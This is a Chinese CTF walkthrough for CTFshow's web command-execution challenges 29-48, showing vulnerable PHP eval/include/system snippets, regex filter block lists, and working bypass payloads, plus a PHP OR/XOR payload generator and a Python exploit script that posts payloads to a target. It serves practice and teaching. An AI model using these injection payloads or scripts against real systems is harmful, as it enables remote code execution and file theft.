CTFSHOW WEB入门 命令执行 web29-48_if (preg_match("/ph/i", substr($_files["file"]["na-程序员宅基地
技术标签: ctfshow-web入门 大数据
目录
web29
#flag在源代码里
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}1.?c=system("cp fla?.php 1.txt") 直接访问/1.txt
2.?c=system("tac fla*.php") // ?c=system("tac fla?.php")
3.?c=eval($_POST[1]); post 1=phpinfo();
测试成功后,使用蚁剑访问,即可查看flag
web30
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} 过滤flag system php
1.?c=eval($_POST[1]); post 1=phpinfo();
测试成功后,使用蚁剑访问,即可查看flag
2.?c=`cp fla?.??? 1.txt`; 直接访问/1.txt
3.?c=`cp fla*.*** 1.txt`; 直接访问/1.txt
web31
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号
1.?c=echo`tac%09fl*`;
2.?c=eval($_POST[1]); 1=phpinfo(); OR 1=system("tac flag.php");
测试成功后,使用蚁剑访问,即可查看flag
3.?c=eval($_GET[1]);&1=phpinfo(); OR 1=system("tac flag.php");
4.show_source(next(array_reverse(scandir(pos(localeconv()))))); //查看flag.php源代码
web32
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号
1.?c=include%0a$_GET[1]?%3E&1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
2.?c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
3.?c=include%0a$_POST[1]?%3E(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web33
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} 过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号
1.?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web34
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号 冒号
1.?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
语言结构:echo print isset unset include require
web35
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号 冒号 < =
1.?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[1]?>(post)1=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web36
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}过滤 flag system php cat sort shell 点 空格 单引号 ` echo 分号 左括号 双引号 冒号 < = / 0-9
1.?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
2.?c=include%0a$_POST[a]?>(post)a=php://filter/convert.base64-encode/resource=flag.php
3.?c=require%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php
4.?c=require%0a$_POST[a]?>(post)a=php://filter/convert.base64-encode/resource=flag.php
返回base64加密flag.php,解码得flag
web37
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}1.?c=data://text/plain,<?php system("tac fla*")?>
或使用base64封装数据
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
2.?c=data://text/plain,<?php system("mv fla?.php 1.txt")?>
web38
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}1.?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
2.?c=data://text/plain,<?= system("tac fla*");?>
web39
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}?c=data://text/plain,<?= system("tac fla*");?>
web40
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
} ?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
web41【跑脚本 但不会】
if(isset($_POST['c'])){
$c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
eval("echo($c);");
}
}else{
highlight_file(__FILE__);
}
?>参考网站:ctfshow web入门 web41_yu22x的博客-程序员宅基地
rce_or.php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Y4tacker
# @Date: 2020-11-21 20:31:22
*/
//或
function orRce($par1, $par2){
$result = (urldecode($par1)|urldecode($par2));
return $result;
}
//异或
function xorRce($par1, $par2){
$result = (urldecode($par1)^urldecode($par2));
return $result;
}
//取反
function negateRce(){
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
}
//mode=1代表或,2代表异或,3代表取反
//取反的话,就没必要生成字符去跑了,因为本来就是不可见字符,直接绕过正则表达式
function generate($mode, $preg='/[0-9]/i'){
if ($mode!=3){
$myfile = fopen("rce.txt", "w");
$contents = "";
for ($i=0;$i<256;$i++){
for ($j=0;$j<256;$j++){
if ($i<16){
$hex_i = '0'.dechex($i);
}else{
$hex_i = dechex($i);
}
if ($j<16){
$hex_j = '0'.dechex($j);
}else{
$hex_j = dechex($j);
}
if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
echo "";
}else{
$par1 = "%".$hex_i;
$par2 = '%'.$hex_j;
$res = '';
if ($mode==1){
$res = orRce($par1, $par2);
}else if ($mode==2){
$res = xorRce($par1, $par2);
}
if (ord($res)>=32&ord($res)<=126){
$contents=$contents.$res." ".$par1." ".$par2."\n";
}
}
}
}
fwrite($myfile,$contents);
fclose($myfile);
}else{
negateRce();
}
}
generate(1,'/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i');
//1代表模式,后面的是过滤规则
本地运行脚本
php-cgi.exe -f [绝对路径]\rce_or.phpexp.py
# -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php D:\\phpstudy_pro\\WWW\\rce_fuzz.php") # 没有将php写入环境变量需手动运行
if (len(argv) != 2):
print("=" * 50)
print('USER:python exp.py <url>')
print("eg: python exp.py http://ctf.show/")
print("=" * 50)
exit(0)
url = argv[1]
def action(arg):
s1 = ""
s2 = ""
for i in arg:
f = open(r"D:\phpstudy_pro\WWW\rce.txt", "r")//填txt的文件位置
while True:
t = f.readline()
if t == "":
break
if t[0] == i:
# print(i)
s1 += t[2:5]
s2 += t[6:9]
break
f.close()
output = "(\"" + s1 + "\"|\"" + s2 + "\")"
return (output)
while True:
param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
data = {
'c': urllib.parse.unquote(param)
}
r = requests.post(url, data=data)
print("\n[*] result:\n" + r.text)
运行命令
python exp.py [url]
web42
if(isset($_GET['c'])){
$c=$_GET['c'];
system($c." >/dev/null 2>&1");
}else{
highlight_file(__FILE__);
}1.?c=tac flag.php%0a
2.?c=tac flag.php;ls
3.?c=cat flag.php;
4.?c=cat flag.php||
5.?c=cat flag.php%26
6.?c=cat flag.php%26%26
测试成功的结尾(换行) ①%0a ②; ③|| ④%26 ⑤%26%26
【参考文章】
commond > /dev/null 2>&1 命令详解_Jimmy1224的博客-程序员宅基地_2>&1 >/dev/null
2>/dev/null和>/dev/null 2>&1和2>&1>/dev/null的区别_林猛男的博客-程序员宅基地_>/dev/null
system($c." >/dev/null 2>&1");个人理解:
1.传入变量c到伪设备上,执行/dev/null - 接受并丢弃所有输入; 不产生输出(总是在读取时返回文件结束指示
2.2>&1 表示将标准输出和标准错误输出都重定向到/dev/null中
【多种/dev/null区别】
2>/dev/null
意思就是把错误输出到“黑洞”
>/dev/null 2>&1
默认情况是1,也就是等同于1>/dev/null 2>&1。意思就是把标准输出重定向到“黑洞”,还把错误输出2重定向到标准输出1,也就是标准输出和错误输出都进了“黑洞”
2>&1 >/dev/null
意思就是把错误输出2重定向到标准出书1,也就是屏幕,标准输出进了“黑洞”,也就是标准输出进了黑洞,错误输出打印到屏幕
web43
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}过滤 分号和cat
1.?c=tac flag.php%0a
2.?c=tac flag.php||
3.?c=tac flag.php%26
4.?c=tac flag.php%26%26
测试成功的结尾(换行) ①%0a ②|| ③%26 ④%26%26
#过滤cat 使用nl也可以正常运行
web44
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/;|cat|flag/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}多过滤flag 使用 * ?进行匹配
1.?c=tac fla*%0a
2.?c=tac fla?????%0a
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
#过滤cat 使用nl也可以正常运行
web45
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| /i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}多过滤空格 使用%09 ${IFS}$ $IFS替换
1.?c=tac${IFS}$fla*||
2.?c=echo$IFS`tac$IFS*`%0A
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
web46
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
}多过滤数字 $ *
1.?c=tac%09fla?????||
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
web47
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
} 多过滤more less head sort tail
1.?c=tac%09fla?????||
2.?c=tac%09fla''g.php%0a
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
web48
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
system($c." >/dev/null 2>&1");
}
}else{
highlight_file(__FILE__);
} 多过滤sed cut awk string od curl `
1.?c=tac%09fla?????||
2.?c=tac%09fla''g.php%0a
测试成功的结尾 ①%0a ②|| ③%26 ④%26%26
智能推荐
卷积神经网络的几种模型_卷积神经网络模型-程序员宅基地
文章浏览阅读7.9k次,点赞9次,收藏53次。关于卷积神经网络的模型,我们这里只谈论关于图像分类的卷积神经网络的四种模型。在这里我们就不对卷积神经网络的结构进行阐述,不了解的同学可以参考我之前的博客LeNet-5首先我们先阐述的是1989年提出来的的LeNet-5结构。它其实就是最原始的结构,卷积层后衔接池化层,再接卷积层和其后的池化层,最后一个全连接层。(c1=convolution layer1,s1=subsampling layer1[降采样层,就是池化层])这个模型是实现识别手写数字的功能为目的而提出..._卷积神经网络模型
【Maven教程】(十):使用 Hudson 进行持续集成—— 从Hudson的安装到任务创建 ~_hudson搭建-程序员宅基地
文章浏览阅读1.4k次。优秀的持续集成工具有很多,如老牌的开源工具CruiseControl 、商业的 Bamboo 和 TeamCity 等。这里只介绍 Hudson, 因为它是目前较流行的开源持续集成工具。该项目过去一直托管在 java.net 社区,不过现在已经迁移到。Hudson 主要是由Kohsuke Kawaguchi 开发和维护的,Kohsuke Kawaguchi 自2001年就已经加入 Sun 公司(当然,现在已经是 Oracle 了)。_hudson搭建
计算机网络物理层第一章物理层详解_物理层的过程特性举例-程序员宅基地
文章浏览阅读5.9k次,点赞25次,收藏153次。计算机网络在我们实际项目中可能应用不多,但是学懂它决定了一个人能成长的上限,进来,一起学_物理层的过程特性举例
Eclipse快速上手Hibernate--1. 入门实例_eclipse hibernate 入門-程序员宅基地
文章浏览阅读5.7w次。 这篇文章主要谈谈Hibernate的入门开发,例子很简单,就是向数据表中添加用户名和密码。我分别使用了三种方法,一种是直接写代码,写Hbm映射文件等;一种是通过Hbm映射文件来生成代码;一种是通过代码来生成Hbm映射文件。使用了一些自动化工具,XMLBuddy是用来编辑XML文件的,JBoss Eclipse IDE是用来编写Doclet标记的。这篇文章还谈到了一些Eclipse的使用技巧_eclipse hibernate 入門
【明道云】如何实现对富文本组件内容的视图查询_明道云 富文本 格式-程序员宅基地
文章浏览阅读172次。富文本无法作为被搜索的字段,无非就是因为富文本包含了太多格式信息、图片等。只要再造一个同步的纯文本组件,把纯文本设置为搜索目标字段即可间接实现搜索富文本内容的需求。明道云视图中可以非常方便地自定义查询字段,但是富文本组件却无法直接作为查询目标字段使用。本篇给出一种WalkAround方法。_明道云 富文本 格式
【mnn】——模型离线量化流程代码浅析_mnn 量化模型-程序员宅基地
文章浏览阅读1.3k次,点赞2次,收藏3次。mnn, 离线量化1. 前言mnn的离线量化,需要首先将其他模型转换成mnn的模型表达,再进行量化。这里我们采用MAX_ABS进行weight权重量化,KL散度进行激活值的量化,int8对称量化。2. Code2.1 mnn模型读入与解析std::unique_ptr<MNN::NetT> netT; { std::ifstream input(modelFile); std::ostringstream outputOs; ._mnn 量化模型
随便推点
《近匠》专访机智云 CTO 刘琰——从 0 到 1 开启智能化硬件开发-程序员宅基地
文章浏览阅读1.1k次。在物联网浪潮之下,智能硬件的火爆程度不断升温。未来十年,全球接入互联网的硬件设备将达到1万亿台。如今的智能硬件产品正成为下一个“台风口”,同时这对于终端市场也是一个机遇。然而从创新走向产品,作为开发者应该如何步步为营?面对传统硬件与智能硬件之间思维理念及技术差异的“鸿沟”,开发者如何提升自己的技能,更加高效地开发?由此,我们带着探索道路上的种种疑问,采访了机智云 CTO ..._机智云科技有限公司刘焱
动态规划 | 完全背包问题 | 组合数、排列数 | leecode刷题笔记_完全背包问题 输出有几种排列-程序员宅基地
文章浏览阅读857次。跟随carl代码随想录刷题语言:python。_完全背包问题 输出有几种排列
Java中的类加载和双亲委派原则_java所有的类的加载都必须遵循双亲委派原则-程序员宅基地
文章浏览阅读361次。Java类加载过程1,加载–》2,验证–》3,准备–,4,解析–》5,初始化加载加载是指将类的class文件读到内存中,并为其创建一个java.lang.Class对象(每个类都有其独一无二的.Class对象),类加载由JVM中的类加载器完成,且其加载一般符合"双亲委派原则",(下文会简单的介绍类加载器和双亲委派原则,不要担心),除此之外,还可以自定义类加载器对类进行初始化;通过不同的类加载器,可以从不同的源加载类的二进制数据文件:1.从本地文件系统加载class文件。2.从JAR包加载cla._java所有的类的加载都必须遵循双亲委派原则
OJ(Online Judge)-程序员宅基地
文章浏览阅读259次。OJ:它是Online Judge系统的简称,用来在线检测程序源代码的正确性。著名的OJ有RQNOJ、URAL等。国内著名的题库有北京大学题库、浙江大学题库等。国外的题库包括乌拉尔大学、瓦拉杜利德大学题库等。ACM:ACM国际大学生程序设计竞赛(英文全称:ACM International Collegiate ProgrammingContest(ACM-ICPC或ICPC)是由美国计算..._online judge csdn
robot framework接口自动化测试post请求_robotframework post请求加token-程序员宅基地
文章浏览阅读1.1w次。之前介绍了get请求不需要传递token的 也介绍了post请求,下面简介一下post请求需要token的方式。首先获取到之前创建的token接下来创建字典格式将请求头赋给变量header作为头文件2.创建session服务器连接,把请求数据传输方式和token传入3.post请求把URI和数据传入4.判断响应状态码是否为2005.将响应格式转换为json格式6.判_robotframework post请求加token
Android Intent传递object_intent object实例-程序员宅基地
文章浏览阅读1k次。Android中Intent传递类对象提供了两种方式一种是 通过实现Serializable接口传递对象,一种是通过实现Parcelable接口传递对象。要求被传递的对象必须实现上述2种接口中的一种才能通过Intent直接传递。Intent中传递这2种对象的方法:Bundle.putSerializable(Key,Object); //实现Serializable接口的_intent object实例